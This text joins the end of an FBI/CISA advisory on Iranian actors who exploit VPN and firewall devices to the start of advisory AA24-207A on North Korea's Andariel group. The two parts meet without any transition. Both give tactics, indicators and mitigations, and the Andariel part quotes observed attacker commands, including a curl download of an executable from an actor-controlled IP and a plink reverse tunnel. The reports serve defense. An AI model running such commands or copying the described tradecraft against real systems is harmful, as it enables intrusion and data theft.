Check Point Security Gateways, probing for devices potentially vulnerable to CVE-2024-24919. As of April 2024, these actors have conducted mass scanning of IP addresses hosting Palo Alto Networks PAN-OS and GlobalProtect VPN devices. The actors were likely conducting reconnaissance and probing for devices vulnerable to CVE-2024-3400. Historically, this group has exploited organizations by leveraging CVE-2019-19781 and CVE-2023-3519 related to Citrix Netscaler, and CVE-2022-1388 related to BIG-IP F5 devices. Reconnaissance, Initial Access, Persistence, and Credential Access The actors have been observed using the Shodan search engine to identify and enumerate IP addresses that host devices vulnerable to a particular CVE. The actors’ initial access is usually obtained via exploiting a public-facing networking device, such as Citrix Netscaler (CVE-2019-19781 and CVE-2023-3519), F5 BIG-IP (CVE-2022-1388), Pulse Secure/Ivanti VPNs (CVE-2024-21887), and, more recently, PanOS firewalls (CVE-2024-3400) [T1596][T1190]. Following exploitation of vulnerable devices, the actors use the following techniques: Capture login credentials using webshells on compromised Netscaler devices and append to file named netscaler.1 in the same directory as the webshell [T1505.003][T1056]. Create the directory /var/vpn/themes/imgs/ on Citrix Netscaler devices to deploy a webshell [T1505.003]. Malicious files deployed to this directory include: netscaler.1 netscaler.php ctxHeaderLogon.php Specifically related to Netscaler, place additional webshells on compromised devices immediately after system owners patch the exploited vulnerability [T1505.003]. The following file locations and filenames have been observed on devices: /netscaler/logon/LogonPoint/uiareas/ui_style.php /netscaler/logon/sanpdebug.php Create the directory /xui/common/images/ on targeted IP addresses [T1133]. Create accounts on victim networks; observed names include “sqladmin$,” “adfsservice,” “IIS_Admin,” “iis-admin,” and “John McCain” [T1136.001]. Request exemptions to the zero-trust application and security policies for tools they intend to deploy on a victim network [T1098]. Create malicious scheduled task SpaceAgentTaskMgrSHR in Windows/Spaceport/ task folder. This task uses a DLL side-loading technique against the signed Microsoft SysInternals executable contig.exe, which may be renamed to dllhost.ext, to load a payload from version.dll. This file has been observed being executed from the Windows Downloads directory [T1053]. Place a malicious backdoor version.dll in C:\Windows\ADFS\ directory [T1505.003]. Use a scheduled task to load malware through installed backdoors [T1053]. Deployment of Meshcentral to connect with compromised servers for remote access [T1219]. For persistence and as detection and mitigation occurs, the actors create a daily Windows service task with random eight characters and attempt execution of a similarly named DLL contained in the C:\Windows\system32\drivers\ directory. For example, a service named “test” was observed attempting to load a file located at C:\WINDOWS\system32\drivers\test.sys [T1505]. Execution, Privilege Escalation, and Defense Evasion Repurpose compromised credentials from exploiting networking devices, such as Citrix Netscaler, to log into other applications (i.e., Citrix XenDesktop) [T1078.003]. Repurpose administrative credentials of network administrators to log into domain controllers and other infrastructure on victim networks [T1078.002]. Use administrator credentials to disable antivirus and security software, and lower PowerShell policies to a less secure level [T1562.001][T1562.010]. Attempt to enter security exemption tickets to the network security device or contractor to get the actor’s tools allowlisted [T1562.001]. Use a compromised administrator account to initiate a remote desktop session to another server on the network. In one instance, the FBI observed this technique being used to attempt to start Microsoft Windows PowerShell Integrated Scripted Environment (ISE) to run the command “Invoke-WebRequest” with a URI including files.catbox[.]moe. Catbox is a free, online file hosting site the actors use as a repository/hosting mechanism [T1059.001]. Discovery Export system registry hives and network firewall configurations on compromised servers [T1012]. Exfiltrate account usernames from the victim domain controller, as well as access configuration files and logs—presumably to gather network and user account information for use in further exploitation efforts [T1482]. Command and Control Install “AnyDesk” remote access program as a backup access method [T1219]. Enable servers to use Windows PowerShell Web Access [T1059.001]. Use the open source tunneling tool Ligolo (ligolo/ligolo-ng) [T1572]. Use NGROK (ngrok[.]io) deployment to create outbound connections to a random subdomain [T1572]. Exfiltration and Impact After infiltrating victim networks, the actors collaborate with ransomware affiliates (including NoEscape, Ransomhouse, and ALPHV [aka BlackCat]) in exchange for a percentage of the ransom payments by providing affiliates with access to victim networks, locking victim networks, and strategizing to extort victims [T1657]. The actors also conduct what is assessed to be separate set of malicious activity—stealing sensitive data from victims [TA0010], likely in support of the GOI. MITRE ATT&CK Tactics and Techniques See Table 1 to Table 9 for all referenced threat actor tactics and techniques in this advisory. Table 1. Reconnaissance Technique Title ID Use or Assessed Use Search Open Technical Databases T1596 Iranian cyber actors use Shodan (Shodan[.]io) to identify internet infrastructure hosting devices vulnerable to particular CVEs. Table 2. Initial Access Technique Title ID Use or Assessed Use Exploit Public-Facing Application T1190 Iranian cyber actors scan and exploit public-facing networking devices, including the following devices and associated CVEs: Citrix Netscaler (CVEs-2019-19781 and CVE-2023-3519) F5 BIG-IP (CVE-2022-1388) Pulse Secure/Ivanti VPNs (CVE-2024-21887) PanOS firewalls (CVE-2024-3400) Check Point Security Gateways (CVE-2024-24919) External Remote Services T1133 Iranian cyber actors create /xui/common/images/ directory on targeted IP addresses. Table 3. Persistence Technique Title ID Use or Assessed Use Server Software Component: Web Shell T1505.003 Iranian cyber actors capture login credentials on compromised Netscaler devices via deployed webshell; create a directory on Netscaler devices for webshell deployment; deploy webshells on compromised Netscaler devices in two directories (observed closely after system owning patching); and place the malicious backdoor version.dll. Create Account (Local Account) T1136.001 Iranian cyber actors create local accounts on victim networks. Account Manipulation T1098 Iranian cyber actors request exemptions to zero-trust application for tools they intend to deploy. Scheduled Task/Job T1053 Iranian cyber actors implement a scheduled task that uses a DLL side-loading technique and a scheduled task that loads malware through back doors. Server Software Component T1505 Iranian cyber actors implement the daily creation of a Windows service task for persistence as detection and mitigation occur. Table 4. Privilege Escalation Technique Title ID Use or Assessed Use Valid Accounts: Local Accounts T1078.003 Iranian cyber actors repurpose compromised credentials (e.g., from a Netscaler device) to log into other applications. Valid Accounts: Domain Accounts T1078.002 Iranian cyber actors repurpose administrative credentials of network admins to log into domain controllers and other infrastructure. Table 5. Defense Evasion Technique Title ID Use or Assessed Use Impair Defenses: Disable or Modify Tools T1562.001 Iranian cyber actors use administrator credentials to disable antivirus and security software. Impair Defenses: Disable or Modify Tools T1562.001 Iranian cyber actors attempt to enter security exemption tickets to the network security device or contractor to get their tools allowlisted. Impair Defenses: Downgrade Attack T1562.010 Iranian cyber actors lower PowerShell policies to a less secure level. Table 6. Credential Access Technique Title ID Use or Assessed Use Input Capture T1056 Iranian cyber actors capture login credentials on compromised Netscaler devices via a deployed webshell. Table 7. Execution Technique Title ID Use or Assessed Use Command and Scripting T1059.001 Iranian cyber actors use an admin account to initiate a remote desktop session to start Microsoft Windows PowerShell ISE. Command and Scripting Interpreter T1059.001 Iranian cyber actors enable servers to use Windows PowerShell Web Access. Table 8. Discovery Technique Title ID Use or Assessed Use Query Registry T1012 Iranian cyber actors export registry hives and network firewall configurations. Domain Trust Discovery T1482 Iranian cyber actors exfiltrate account usernames from the domain controller and access configuration files and logs. Table 9. Command and Control Technique Title ID Use or Assessed Use Remote Access Software T1219 Iranian cyber actors install “AnyDesk” remote access program. Iranian cyber actors deploy Meshcentral to connect with compromised servers for remote access. Protocol Tunneling T1572 Iranian cyber actors use ligolo / ligolo-ng for open source tunneling and ngrok[.]io NGROK to create outbound connections to a random subdomain. Indicators of Compromise IP Address and Domain Identifiers Disclaimer: The IP addresses and domains listed in Table 10 were observed in use by the actors in the specified timeframes in 2024. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking. Comment: In addition to the infrastructure provided in the table below, the FBI and CISA warn that these actors are known to leverage information obtained through intrusions into cloud-computing resources associated with victim organizations. The actors have used this cloud infrastructure to conduct further cyber operations targeting other organizations. The FBI observed use of this tradecraft against U.S. academic and defense sectors, but it could theoretically be used against any organization. The FBI and CISA warn that if these actors compromised your organization, they may be leveraging your cloud services accounts to conduct malicious cyber activity and target other victims. The FBI has observed instances of the actors using compromised cloud service accounts to transmit data stolen from other compromised organizations. Table 10. Indicators of Compromise – Recent Indicator First Seen Most Recently Observed Date 138.68.90[.]19 January 2024 August 2024 167.99.202[.]130 January 2024 August 2024 78.141.238[.]182 July 2024 August 2024 51.16.51[.]81 January 2024 August 2024 51.20.138[.]134 February 2024 August 2024 134.209.30[.]220 March 2024 August 2024 13.53.124[.]246 February 2024 August 2024 api.gupdate[.]net September 2022 August 2024 githubapp[.]net February 2024 August 2024 Disclaimer: The infrastructure in Table 11 reflects historical IP addresses and domains associated with these actors. This data is being provided for informational purposes and to enable better tracking and attribution of these actors. The FBI and CISA do not recommend blocking of the indicators in Table 11 based solely on their inclusion in this CSA. Table 11. Indicators of Compromise – Historical Indicator First Seen Most Recently Observed Date 18.134.0[.]66 September 2023 November 2023 193.149.190[.]248 September 2023 January 2024 45.76.65[.]42 September 2023 December 2023 206.71.148[.]78 October 2023 January 2024 193.149.187[.]41 October 2023 November 2023 login.forticloud[.]online October 2023 November 2023 fortigate.forticloud.[]online October 2023 November 2023 cloud.sophos[.]one October 2023 November 2023 Actor Identifiers Disclaimer: The FBI observed the following identifiers associated with the Iranian cyber group and their ransomware affiliates. The FBI is providing this information to enable improved threat actor identification and tracking of malicious cyber activity. Please see Appendix A for list of TOX identifiers. The FBI observed the threat actors to be associated with the following bitcoin address values: bc1q8n7jjgdepuym825zwwftr3qpem3tnjx3m50ku0 bc1qlwd94gf5uhdpu4gynk6znc5j3rwk9s53c0dhjs bc1q2egjjzmchtm3q3h3een37zsvpph86hwgq4xskh bc1qjzw7sh3pd5msgehdaurzv04pm40hm9ajpwjqky bc1qn5tla384qxpl6zt7kd068hvl7y4a6rt684ufqp bc1ql837eewad47zn0uzzjfgqjhsnf2yhkyxvxyjjc bc1qy8pnttrfmyu4l3qcy59gmllzqq66gmr446ppcr bc1q6620fmev7cvkfu82z43vwjtec6mzgcp5hjrdne bc1qr6h2zcxlntpcjystxdf7qy2755p25yrwucm4lq bc1qx9tteqhama2x2w9vwqsyny6hldh8my8udx5jlm bc1qz75atxj4dvgezyuspw8yz9khtkuk5jpdgfauq8 bc1q6w2an66vrje747scecrgzucw9ksha66x9zt980 bc1qsn4l6h3mhyhmr72vw4ajxf2gr74hwpalks2tp9 bc1qtjhvqkun4uxtr4qmq6s3f7j49nr4sp0wywp489 Mitigations The FBI and CISA recommend all organizations implement the mitigations listed below to improve their cybersecurity posture based on the Iranian cyber group’s activity. The FBI judges the group’s targeting is primarily based on the identification of devices vulnerable to CVEs named in this notification (see Technical Details section for a list of CVEs). As such, any U.S. organization deploying software with these vulnerabilities may be targeted for further exploitation and should follow this guidance to defend against exploitation by this group. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. The FBI and CISA recommend all organizations implement the following mitigations: Review available logs for IP addresses in Table 10 for indications of traffic with your organization’s network in the provided timeframes [CPG 3.A]. The indicators in Table 11 should also be reviewed to identify historical activity or incidents which may have previously been identified by your organization. Apply patches and/or mitigations for CVE-2024-3400, CVE-2022-1388, CVE-2019-19781, and CVE-2023-3519 [CPG 1.E]. Be advised, patching for the above referenced CVEs may be insufficient to mitigate malicious activity if your network has already been compromised by these actors while the network device was vulnerable. Additional investigation into the use of stolen credentials (e.g., via the webshell on Netscaler devices) is strongly encouraged to identify threat actor attempts to establish footholds on other parts of the network [CPG 3.A]. Check your systems for the unique identifiers and TTPs used by the actors when operating on compromised networks, including creation of specific usernames, use of NGROK and Ligolo, and deployment of webshells in specific directories [CPG 3.A]. Check your systems for outbound web requests to files.catbox[.]moe and ***.ngrok[.]io [CPG 3.A]. Validate Security Controls In addition to applying mitigations, the FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 2 to Table 10). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. References Fox Kitten, UNC757, Parisite, Pioneer Kitten, RUBIDIUM, Lemon Sandstorm, Group G0117 | MITRE ATT&CK® PIONEER KITTEN: Targets & Methods [Adversary Profile] (crowdstrike.com) NoEscape - SentinelOne RansomHouse - SentinelOne Pay2Key, Software S0556 | MITRE ATT&CK® Pay2Key Ransomware Alert - Check Point Research Reporting Your organization has no obligation to respond or provide information back to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws. Ransomware Incidents The FBI and CISA are interested in any information that can be shared in the case of a ransomware incident, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complain Center (IC3), your local FBI Field Office, or CISA via the agency’s Incident Reporting Form or its 24/7 Operations Center (report@cisa.gov), or by calling 1-844-Say-CISA (1-844-729-2472). Other Incidents U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to the FBI’s Internet IC3 or your local FBI Field Office. Report suspicious or malicious cyber activity to CISA via the agency’s Incident Reporting Form or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. Disclaimer The information in this report is being provided “as is” for informational purposes only. The FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA. Version History August 20, 2024: Initial version. Appendix A: TOX Identifiers TOX Identifier TOX Public Key Comment xplfinder ea2ec0c3859d8d8c36d95a298beef6d7add17856655bfbea2554b8714f7c7c69 Iranian cyber group Br0k3r B761680E23F2EBB5F6887D315EBD05B2D7C365731E093B49ADB059C3DCCAA30C Iranian cyber group Access 185ADA4556737A4F26AE16F1A99CA82AB5684C32719EE426C420C0BC14384A0A Ransomware affiliate Admin ALPHV aka BlackCat 3488458145EB62D7D3947E3811234F4663D9B5AEEF6584AB08A2099A7F946664 Ransomware affiliate Admin_NoEscape 0A6F992E1372DB4F245595424A7436EBB610775D6ADDC4D568ACC2AF5D315221 Ransomware affiliate Americano_Sneeckers 14F8AD7D1553D1A47CF4C9E7BEDABCC5B759C86E54C636175A472C11D7DEC70F Ransomware affiliate Bettersock 2C76104C9AAAF32453A814C227E7D9D755451B551A3FD30D2EA332DF396B3A31 Ransomware affiliate
Summary The U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju: U.S. Cyber National Mission Force (CNMF) U.S. Cybersecurity and Infrastructure Security Agency (CISA) U.S. Department of Defense Cyber Crime Center (DC3) U.S. National Security Agency (NSA) Republic of Korea’s National Intelligence Service (NIS) Republic of Korea’s National Police Agency (NPA) United Kingdom’s National Cyber Security Centre (NCSC) The RGB 3rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified technical information and intellectual property to advance the regime’s military and nuclear programs and ambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities. The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration. The actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives. The authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a timely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While not exclusive, entities involved in or associated with the below industries and fields should remain vigilant in defending their networks from North Korea state-sponsored cyber operations: For additional information on DPRK state-sponsored malicious cyber activity, see CISA’s North Korea Cyber Threat Overview and Advisories webpage. Download the PDF version of this report: AA24-207A North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs (PDF, 804.21 KB ) AA24-207A North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs - Spanish Translation (PDF, 836.55 KB ) For a downloadable copy of associated indicators of compromise (IOCs), see: AA24-207A STIX XML (XML, 296.99 KB ) AA24-207A STIX JSON (JSON, 140.84 KB ) Technical Details RGB 3rd Bureau Andariel (also known as Onyx Sleet, formerly PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in Pyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks targeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware operations. Cyber Espionage The actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear, engineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for more victimology information. Table 1. Andariel Cyber Espionage Victimology Industry Information Targeted Defense Heavy and light tanks and self-propelled howitzers Light strike vehicles and ammunition supply vehicles Littoral combat ships and combatant craft Submarines, torpedoes, unmanned underwater vehicles (UUVs), and autonomous underwater vehicles (AUVs) Modeling and simulation services Aerospace Fighter aircraft and unmanned aerial vehicles (UAVs) Missiles and missile defense systems Satellites, satellite communications, and nano-satellite technology Surveillance radar, phased-array radar, and other radar systems Nuclear Uranium processing and enrichment Material waste and storage Nuclear power plants Government nuclear facilities and research institutes Engineering Shipbuilding and marine engineering Robot machinery and mechanical arms Additive manufacturing and 3D printing components and technology Casting, fabrication, high-heat metal molding, and rubber and plastic molding Machining processes and technology The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense programs. Ransomware Andariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and in some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same entity. For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector. Malicious Cyber Espionage Activity This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques. Reconnaissance and Enumeration While there is limited available information on the group’s initial reconnaissance methods, the actors likely identify vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers [T1595, T1592]. The actors gather open source information about their victims for use in targeting [T1591] and research Common Vulnerabilities and Exposures (CVEs) when published to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596]. CVEs researched include: CVE-2023-46604 – Apache ActiveMQ CVE-2023-42793 – TeamCity CVE-2023-3519 – Citrix NetScaler CVE-2023-35078 – Ivanti Endpoint Manager Mobile (EPMM) CVE-2023-34362 – MOVEIt CVE-2023-33246 – RocketMQ CVE-2023-32784 – KeePass CVE-2023-32315 – Openfire CVE-2023-3079 – Google Chromium V8 Type Confusion CVE-2023-28771 and CVE-2023-33010 – Zyxell firmware CVE-2023-2868 – Barracuda Email Security Gateway CVE-2023-27997 – FortiGate SSL VPN CVE-2023-25690 – Apache HTTP Server CVE-2023-21932 – Oracle Hospitality Opera 5 CVE-2023-0669 – GoAnywhere MFT CVE-2022-47966 – ManageEngine CVE-2022-41352 and CVE-2022-27925 – Zimbra Collaboration Suite CVE-2022-30190 – Microsoft Windows Support Diagnostic Tool CVE-2022-25064 – TP-LINK CVE-2022-24990 and CVE-2021-45837 – TerraMaster NAS CVE-2022-24785 – Moment.js CVE-2022-24665, CVE-2022-24664, and CVE-2022-24663 – PHP Everywhere CVE-2022-22965 – Spring4Shell CVE-2022-22947 – Spring Cloud Gateway CVE-2022-22005 – Microsoft SharePoint Server CVE-2022-21882 – Win32k Elevation of Privilege CVE-2021-44228 – Apache Log4j CVE-2021-44142 – Samba vfs_fruit module CVE-2021-43226, CEV-2021-43207, CVE-2021-36955 – Windows log file vulnerabilities CVE-2021-41773 – Apache HTTP Server 2.4.49 CVE-2021-40684 – Talend ESB Runtime CVE-2021-3018 – IPeakCMS 3.5 CVE-2021-20038 – SMA100 Apache httpd server (SonicWall) CVE-2021-20028 – SonicWall Secure Remote Access (SRA) CVE-2019-15637 – Tableau CVE-2019-7609 – Kibana CVE-2019-0708 – Microsoft Remote Desktop Services CVE-2017-4946 – VMware V4H and V4PA Resource Development, Tooling, and Remote Access Tools The actors leverage custom tools and malware for discovery and execution. Over the last 15 years, the group has developed RATs, including the following, to permit remote access and manipulation of systems and lateral movement. Atharvan ELF Backdoor Jupiter MagicRAT “No Pineapple” TigerRAT Valefor/VSingle ValidAlpha YamaBot NukeSped Goat RAT Black RAT AndarLoader DurianBeacon Trifaux KaosRAT Preft Andariel Scheduled Task Malware BottomLoader (see Cisco Talos blog Operation Blacksmith) NineRAT (see Cisco Talos blog Operation Blacksmith) DLang (see Cisco Talos blog Operation Blacksmith) Nestdoor (see AhnLab blog) These tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control (C2) [T1587.001, T1587.004]. The tools allow the actors to maintain access to the victim system with each implant having a designated C2 node. Commodity Malware and Dual-Use Applications Commodity malware is malicious software widely available for purchase or use and is leveraged by numerous different threat actors. Dual-use applications are software tools widely available for purchase or use that are commonly utilized by administrators and users for system administration or other legitimate purposes and also by threat actors for malicious activities. These dual-use applications may reside locally, known as Living Off the Land (LOTL) tools, or be transferred to the target system during the attack. The use of publicly available malware and dual-use applications. The use of publicly available malware and dual-use applications enables the actors to conceal and obfuscate their identities and leads to attribution problems. The authoring agencies are reliant on the use of custom malware and loaders, along with overlapping C2 nodes to attribute commodity malware to the actors. The actors have at times achieved great success obfuscating their identities by leveraging open source malware. The authoring agencies have identified the following open-source and dual-use tools as used and/or customized by the actors: 3Proxy [T1090] AdFind [S0552] AsyncRAT DeimosC2 Impacket [T1090] Juggernaut [T1040] Lilith RAT ORVX Web Shell Mimikatz [S0002] PLINK [T1572] ProcDump [T1003] PuTTY [T1572] SOCKS5 [T1090] Stunnel [T1572] Web Shell by Orb (WSO) WinRAR [T1560] WinSCP [T1048] RDP Wrapper [T1572] Initial Access The actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 (“Log4Shell”) in Apache’s Log4j software library and other CVEs listed above, to deploy web shells and gain access to sensitive information and applications for further exploitation. The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously [T1190]. Execution The actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration. While individual commands typically vary, the authoring agencies assess the actors prefer netstat commands, such as netstat –naop and netstat –noa [T1059]. Example commands used by the actors include the following: netstat –naop netstat –noa pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe C:\windows\system32\cmd.exe /c systeminfo | findstr Logon These actors often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the English language, including common errors such as “Microsoft Cooperation” (rather than “Microsoft Corporation”) found across numerous RGB 3rd Bureau malware samples. Defense Evasion The actors routinely pack late-stage tooling in VMProtect and Themida. Malicious tooling packed with these and other commercial tools have advanced anti-debugging and detection capabilities. These files are typically multiple megabytes in size and often contain unusual file section names such as vmp0 and vmp1 for VMProtect and Themida or randomized file section names for Themida [T1027]. Credential Access The actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including the use of publicly available credential theft utilities and dual-use tools such as Mimikatz, Dumpert, and ProcDump, and accessing the Active Directory domain database through targeting of the NTDS.dit file. The authoring agencies assess the actors change settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the vssadmin command-line utility to back up a volume to retrieve a copy of the NTDS.dit file containing Active Directory data. In another instance, the actors were observed collecting registry hive data for offline extraction of credentials [T1003]. Discovery The actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files. The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes [T1087, T1083]. The actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network [T1021.002]. Lateral Movement The actors also use system logging for discovery to move laterally. The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the %Temp% directory. The actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021]. Command and Control The actors leverage techniques and infrastructure positioned around the world to send commands to compromised systems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy [T1090, T1071]. Collection and Exfiltration Malware previously used by the actors permitted placement and access to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious tooling [T1560, T1039]. The actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data [T1567]. The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols [T1048]. The actors have also been identified staging files for exfiltration on victim machines, establishing Remote Desktop Protocol connections, and conducting HTTP GET requests on port 80 to receive information [T1021]. Indicators of Compromise See below for Andariel IOCs. The following include observed MD5 hashes: 88a7c84ac7f7ed310b5ee791ec8bd6c5 6ab4eb4c23c9e419fbba85884ea141f4 97ce00c7ef1f7d98b48291d73d900181 079b4588eaa99a1e802adf5e0b26d8aa 0873b5744d8ab6e3fe7c9754cf7761a3 0d696d27bae69a62def82e308d28857a 0ecf4bac2b070cf40f0b17e18ce312e6 17c46ed7b80c2e4dbea6d0e88ea0827c 1f2410c3c25dadf9e0943cd634558800 2968c20a07cfc97a167aa3dd54124cda 33e85d0f3ef2020cdb0fc3c8d80e8e69 4118d9adce7350c3eedeb056a3335346 4aa57e1c66c2e01f2da3f106ed2303fa 58ad3103295afcc22bde8d81e77c282f 5c41cbf8a7620e10f158f6b70963d1cb 61a949553d35f31957db6442f36730c5 72a22afde3f820422cfdbba7a4cbabde 84bd45e223b018e67e4662c057f2c47e 86465d92f0d690b62866f52f5283b9fc 8b395cc6ecdec0900facf6e93ec48fbb 97f352e2808c78eef9b31c758ca13032 a50f3b7aa11b977ae89285b60968aa67 afd25ce56b9808c5ed7eade75d2e12a7 afdeb24975a318fc5f20d9e61422a308 b697b81b341692a0b137b2c748310ea7 bcac28919fa33704a01d7a9e5e3ddf3f c027d641c4c1e9d9ad048cda2af85db6 c892c60817e6399f939987bd2bf5dee0 cdeae978f3293f4e783761bc61b34810 d0f310c99476f1712ac082f78dd29fdc d8da33fae924b991b776797ba8cde24c e230c5728f9ea5a94e390e7da7bf1ffa f4d46629ca15313b94992f3798718df7 fb84a392601fc19aeb7f8ce11b3a4907 ff3194d3d5810a42858f3e22c91500b1 13b4ce1fc26d400d34ede460a8530d93 41895c5416fdc82f7e0babc6bb6c7216 c2f8c9bb7df688d0a7030a96314bb493 33a3da2de78418b89a603e28a1e8852c 4896da30a745079cd6265b6332886d45 73eb2f4f101aab6158c615094f7a632a 7f33d2d2a2ce9c195202acb59de31eee e1afd01400ef405e46091e8ef10c721c fe25c192875ec1914b8880ea3896cda2 232586f8cfe82b80fd0dfa6ed8795c56 c1f266f7ec886278f030e7d7cd4e9131 49bb2ad67a8c5dfbfe8db2169e6fa46e beb199b15bd075996fa8d6a0ed554ca8 4053ca3e37ed1f8d37b29eed61c2e729 3a0c8ae783116c1840740417c4fbe678 0414a2ab718d44bf6f7103cff287b312 ca564428a29faf1a613f35d9fa36313f ad6d4eb34d29e350f96dc8df6d8a092e dc70dc9845aa747001ebf2a02467c203 3d2ec58f37c8176e0dbcc47ff93e5a76 0a09b7f2317b3d5f057180be6b6d0755 1ffccc23fef2964e9b1747098c19d956 9112efb49cae021abebd3e9a564e6ca4 ac0ada011f1544aa3a1cf27a26f2e288 0211a3160cc5871cbcd4e5514449162b 7416ea48102e2715c87edd49ddbd1526 a2aefb7ab6c644aa8eeb482e27b2dbc4 